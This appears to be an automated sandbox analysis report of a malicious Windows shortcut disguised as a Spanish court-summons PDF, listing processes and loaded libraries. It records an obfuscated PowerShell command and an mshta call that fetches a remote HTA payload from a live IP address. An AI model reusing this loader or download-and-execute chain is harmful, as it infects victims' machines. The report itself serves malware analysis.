Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.hta
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.htaJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: DEMANDA JUICIO JUZGADO01.pdf.lnkLNK file: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Obfuscated command line found
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $E='T:17S2zMhsAlcpo65y9tar4/.'; &(-join($E[(472-468),(979-969),(299-288)])) ^= (-join($E[(472-468),(979-969),(299-288)])); ^= *% (-join($E[(757-750),(472-468),(769-761),(-904+904),(979-969)])); foreach($S in @((727-719),(-217+236),(-171+190),(387-374),(-940+941),(-632+655),(-622+645),(-144+162),(771-749),(-482+506),(-457+459),(691-675),(-573+595),(518-494),(-755+757),(-277+280),(262-257),(-797+821),(-706+708),(-556+571),(-847+862),(-704+727),(628-615),(308-296),(-217+223),(-338+357),(584-561),(763-742),(297-283),(-211+228),(677-660),(470-453),(-88+108),(-503+512),(-258+282),(194-186),(856-837),(-659+679))){$i+=$E[$S]}; *% $i;

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.lnkStatic PE information: DEMANDA JUICIO JUZGADO01.pdf.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5171Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4686Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7860Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC2D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: mshta.exe, 00000003.00000002.3401055468.000001CEAC326000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.3401055468.000001CEAC356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3402713787.0000017611E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.3401459531.000001760C82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://94.154.172.166/pczt/royyyas.htaJump to behavior
